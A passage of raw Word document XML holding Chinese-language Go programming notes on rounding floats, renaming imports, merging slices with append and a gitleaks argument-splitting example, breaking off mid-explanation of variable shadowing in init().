      <w:r>
        <w:t>保留</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>位小数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EE84AB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(num1)   // 0.43</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27645BC1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">num2, _ := strconv.ParseFloat(fmt.Sprintf("%.5f", float64(a)/float64(b)), 64) // </w:t>
      </w:r>
      <w:r>
        <w:t>保留</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>位小数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5020C777" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(num2)   // 0.42857</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1490FD98" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195D7023" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30A39FDE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="290" w:name="_Toc159779750"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引入包的重命名</w:t>
      </w:r>
      <w:bookmarkEnd w:id="290"/>
    </w:p>
    <w:p w14:paraId="1038E77C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72153FBC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    gourl "net/url"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343AF846" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55535B56" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "myother.com/url"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E3DE23" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CDD422" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="344FFA17" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="291" w:name="_Toc159779751"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>slice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
      <w:bookmarkEnd w:id="291"/>
    </w:p>
    <w:p w14:paraId="7B3A00BF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>优雅的合并其他的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>slice:append(s1, s2...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3B88A8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35F69D2D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F8A2D6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D8BBD43" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import "fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E8A528" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C14C614" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FF98E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    s1 := []int{0, 1, 2, 3}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F989846" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    s2 := []int{4, 5, 6, 7}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C169989" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A0CEA04" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    s1 = append(s1, s2...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7AA612" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    fmt.Println(s1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6841DBE0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419D0A53" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40A1E5D9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>案例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:gitleaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的命令行参数拆分</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFB8B8D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if logOpts != "" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56257245" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>args := []string{"-C", sourceClean, "log", "-p", "-U0"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759D96EE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>args = append(args, strings.Split(logOpts, " ")...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B42ECF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>cmd = exec.Command("git", args...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507488E6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B4C742" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>cmd = exec.Command("git", "-C", sourceClean, "log", "-p", "-U0",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4CF170" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"--full-history", "--all")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D733F3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF0B816" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CD2F06A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="292" w:name="_Toc159779752"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何使用全局变量：避免</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>not used</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报错</w:t>
      </w:r>
      <w:bookmarkEnd w:id="292"/>
    </w:p>
    <w:p w14:paraId="435E1D33" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://www.jb51.net/article/211453.htm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C930FC3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00D06457" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>知道原因之后就容易解决了，我不使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就可以了。代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A60F6F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EAAE725" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看下面的代码，定义了一个全局变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，我想在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>init()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中给他赋值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中使用它。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D72693B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="093BE0C4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592A7AFF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBD6087" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752CF75A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591A2F81" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9D52C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7DCA94" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D15645" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E7925A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E62EC8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9D8F50" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8FD60B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>var t int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02131FB8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func init() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B48067" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    t, err := strconv.Atoi("2")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AECFDA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A68C645" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        log.Fatalln(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608B2A5E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E5482A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    fmt.Println("init:", t)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580E624D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADE0528" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7278998F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    fmt.Println("main:", t)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A7EE79" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2074649C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C44878B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C10B54A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>init: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0807B0E7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A1A394E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B151F55" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="045FC9FD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行之后，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中打印出了不一样的数字，为什么会不一样呢，可能你仔细一看就知道原因了。很简单，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
